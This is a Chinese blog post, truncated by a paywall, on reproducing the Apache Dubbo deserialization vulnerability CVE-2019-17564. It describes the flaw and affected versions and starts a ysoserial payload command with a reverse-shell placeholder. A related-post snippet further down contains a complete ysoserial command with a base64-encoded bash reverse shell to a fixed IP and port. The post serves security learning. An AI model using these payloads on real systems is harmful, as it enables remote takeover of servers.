Aapche Dubbo 反序列化漏洞复现(CVE-2019-17564)

已于 2023-11-24 02:32:39 修改
阅读量842 收藏 4
点赞数 6
分类专栏: 漏洞复现 文章标签: dubbo java 开发语言 网络安全 web安全
于 2022-12-24 23:56:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/128432524
版权
本文详细介绍了Apache Dubbo的反序列化漏洞(CVE-2019-17564),该漏洞发生在使用http协议时,由于依赖Spring的HttpInvokerServiceExporter类,导致接收POST请求时进行反序列化操作,影响范围涉及2.7.4及更早版本。文章还阐述了漏洞的利用流程,包括使用ysoserial生成payload并发送请求,以及如何修复此问题。
摘要由CSDN通过智能技术生成


1、产品简介


     Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。

2、漏洞概述


      Dubbo可以使用不同协议通信,当使用http协议时,Apache Dubbo直接使用了Spring框架的org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter类做远程调用,而这个过程会读取POST请求的Body并进行反序列化,最终导致漏洞。

3、影响范围


     Apache Dubbo 2.7.4及以前版本

4、利用流程

 

1、使用工具ysoserial生成payload
    工具地址:https://github.com/frohoff/ysoserial

 java -jar ysoserial-all.jar CommonsCollections4 "bash -c {echo,反弹shell指令}|{base64,-d}|{bash,-i}&#
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 6
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
[Flink课程]---- 1.1 关于 Apache Flink
欢迎来到我的博客,一起探索代码里的世界!
09-18 2512
一、官方介绍 1、jira:https://issues.apache.org/jira/projects/FLINK 2、wiki:https://cwiki.apache.org/confluence/display/FLINK/Powered+by+Flink 3、github:https://github.com/apache/flink 4、社区:https://data-art...
Apache Dubbo反序列化漏洞复现分析
include_voidmain的博客
03-10 3068
Apache Dubbo反序列化漏洞复现分析
Apache Dubbo(CVE-2019-17564) Java反序列化漏洞复现笔记(最详细版本)
精品博客,你值得一看~
08-25 1325
java -jar ysoserial-master-2874a69f61-1.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4NC4xMzYvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" > 2.poc #生成反弹shell的脚本2.poc ,这里将刚刚复制的内容贴到双引号里面执行。
Aapche Dubbo Java反序列化漏洞CVE-2019-17564漏洞复现
weixin_48413667的博客
09-14 1380
一、软件介绍 Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。 二、漏洞描述 Dubbo可以使用不同协议通信,当使用http协议时,Apache Dubbo直接使用了Spring框架的org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter类做远程调用,而这个过程会读取POST请求的Body并进行反序列化,最终导致漏洞。 三、影响范围 Apache Dubbo ...
《Vulhub-Aapche Dubbo Java反序列化漏洞(CVE-2019-17564)》
weixin_47118413的博客
12-29 986
在之前我想起在Vulhub漏洞平台复现过Aapche Dubbo Java反序列化漏洞(CVE-2019-17564),虽然不是最新的(CVE-2022-39198)漏洞,但也想把(CVE-2019-17564)分享一下。
CVE-2019-17564漏洞复现[基于Ubuntu 16.04 LTS]
rep_Su的博客
02-15 5130
基于Ubuntu 16.04 LTS的CVE-2019-17563漏洞复现0x0 漏洞描述0x1 影响范围0x2 漏洞复现环境准备环境搭建漏洞展示0x3 其他修复建议关于此文参考链接 0x0 漏洞描述 Apache Dubbo支持多种协议,官方推荐使用 Dubbo 协议,CVE-2019-17564是属于Apache Dubbo HTTP协议中的一个反序列化漏洞,该漏洞的主要原因在于当Apache...
Apache Dubbo 反序列化漏洞(CVE-2020-1948)
m0_46689007的博客
11-29 700
使用marshalsec开启ldap时,如果ldap服务和http服务上有日志,但时恶意命令没有执行,可以将"http://192.168.146.128#exp "改为"http://192.168.146.128/#exp"docker环境执行命令可能需要编码,如果ldap服务和http服务上有日志,但时恶意命令没有执行,将命令编码。看到ldap服务被访问,重定向到我们的http服务上的exp.class类。这一段是被攻击机访问攻击机的http服务上的恶意类exp.class。
[CVE-2020-1948] Apache Dubbo 反序列化漏洞分析
小王的储物间
12-13 597
Dubbo 是一款高性能、轻量级的开源 Java RPC 框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。
简单的Apache Airflow(CVE-2022-40127)漏洞复现
kali_Ma的博客
12-09 1553
Apache Airflow 是一个可编程,调度和监控的工作流平台,基于有向无环图(DAG),Airflow 可以定义一组有依赖的任务,按照依赖依次执行。官方已发布版本 2.4.3,可升级Apache Airflow版本到2.4.0或以上,或者停用默认 Dags。当攻击者可访问到Apache Airflow的后台,且环境中存在默认。
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 942
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
CVE-2019-17564 Apache-Dubbo反序列化漏洞.md
04-12
CVE-2019-17564Apache-Dubbo反序列化漏洞
PHP、Aapche、MySQL配置教程
05-20
在本文中,我们将深入探讨如何配置PHP、Apache和MySQL,这三个组件是构建基于Web的动态应用程序的常用技术栈。... 首先,我们需要分别下载这三款软件的安装文件。MySQL可以从官方网站下载适用于Windows的msi安装包,...
Aapche Dubbo Java反序列化漏洞复现
Tauil的博客
07-29 544
将以下工具下载到攻击机中ZooKeeper — 输入以下命令,下载完成后解压即可 ysoserial — 输入下面命令,如果该方式下载不成功直接浏览器访问网站下载 漏洞复现 准备攻击机,靶机安装有的靶机中输入下列命令开启环境 攻击机终端中输入 发现了2181端口是用于转发服务的,那么其作用可能是用于目标网页进行api服务转发,所以该端口可能包含了registry(远程注册表服务器,一般都是用ZooKeeper作为registry,我们可以尝试通过 zookeeper 进行连接进入先前下载的 zooke
Aapche Dubbo安全Java 反序列化CVE-2019-17564
weixin_56537388的博客
11-27 349
Apache Dubbo 是一个高性能的、基于 Java 的开源 RPC 框架。
dubbo CVE-2019-17564 CVE-2020-1948 漏洞复现
寒星的博客
06-02 2359
简介 Apache Dubbo是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。 CVE-2019-17564 漏洞简介 Apache Dubbo支持多种协议,官方默认为 Dubbo 协议,但是当用户选择http协议进行通信时,Apache Dubbo 在接受来自消费者的远程调用的POST请求的时候会执行一个反序列化的操作,由于没有任何安全校验,于是可以造成反序列化执行任意代码。 影响版本 2.7.0 <= Ap.
[CVE-2019-17564] Apache Dubbo deserialization vulnerability
公众号shadow sock7
02-12 1341
参考 https://mp.weixin.qq.com/s/pHnhHMNArAiZPVGR1btZIg https://www.mail-archive.com/dev@dubbo.apache.org/msg06225.html
反序列化漏洞_Dubbo反序列化漏洞复现分析
weixin_39607837的博客
12-14 269
1.Dubbo框架简介Dubbo是⼀个⾼性能服务框架,致⼒于提供⾼性能和透明化的RPC远程服务调⽤⽅案,以及SOA服务治理⽅案,使得应⽤可通过⾼性能RPC实现服务的输出和输⼊功能,和Spring框架可以⽆缝集成。作为⼀个分布式服务框架,以及SOA治理⽅案,Dubbo其功能主要包括:1.⾼性能NIO通讯及多协议集2.成服务动态寻址与路由3.软负载均衡与容错4.依赖分析与服务降级具体看这篇⽂...
okhttp,retrofit,rxjava 是如何配合工作的 作用分别是什么
最新发布
追梦的鱼儿
09-04 538
OkHttp、Retrofit 和 RxJava 是 Android 开发中常用的三种库,它们各自有不同的作用,并且可以很好地配合工作来实现网络请求和响应的处理。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值